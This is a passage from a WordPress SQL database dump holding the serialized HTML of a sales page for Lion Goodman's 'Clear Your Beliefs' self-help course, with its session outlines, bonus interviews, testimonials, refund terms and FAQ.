stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1910, 2188, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72792:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the 